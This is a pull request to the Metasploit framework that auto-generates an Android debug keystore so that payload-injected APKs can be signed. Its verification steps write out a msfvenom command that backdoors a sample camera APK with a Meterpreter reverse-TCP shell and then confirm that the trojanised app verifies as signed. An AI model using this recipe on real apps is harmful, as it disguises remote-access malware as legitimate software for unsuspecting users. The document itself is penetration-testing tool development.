### PR TITLE
Automatically generate keystore for android apk signing

### DIFF
--- a/lib/msf/core/payload/apk.rb
+++ b/lib/msf/core/payload/apk.rb
@@ -141,6 +141,17 @@ module Msf::Payload::Apk
       raise RuntimeError, "apktool version #{apk_v} not supported, please download at least version 2.0.1."
     end
 
+    unless File.readable?(File.expand_path("~/.android/debug.keystore"))
+      android_dir = File.expand_path("~/.android/")
+      unless File.directory?(android_dir)
+        FileUtils::mkdir_p android_dir
+      end
+      print_status "Creating android debug keystore...\n"
+      run_cmd("keytool -genkey -v -keystore ~/.android/debug.keystore \
+      -alias androiddebugkey -storepass android -keypass android -keyalg RSA \
+      -keysize 2048 -validity 10000 -dname 'CN=Android Debug,O=Android,C=US'")
+    end
+
     #Create temporary directory where work will be done
     tempdir = Dir.mktmpdir
 


### PR DESCRIPTION
It was mentioned in https://github.com/rapid7/metasploit-framework/pull/6385 that if you don't have a ~/.android/debug.keystore file then signing will fail. This change simply generates the android debug keystore if it is not available.
If you have just freshly downloaded the android sdk and have never built an Android app before, the debug keystore will not have been generated.
## Verification

List the steps needed to make sure this thing works
- [x] Delete or move your ~/.android/ folder: `mv ~/.android/ ~/.androidbackup`
- [x] Download and backdoor an apk:

```
wget https://github.com/heavysixer/phonegap-camera-sample/blob/master/bin/CameraSample.apk?raw=true -O CameraSample.apk
./msfvenom -x CameraSample.apk -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -o CameraSample_backdoored.apk
```
- [x] **Verify** You see `[*] Creating android debug keystore...` in the output
- [x] **Verify** The apk is signed:

```
jarsigner -verify CameraSample_backdoored.apk
jar verified.
```
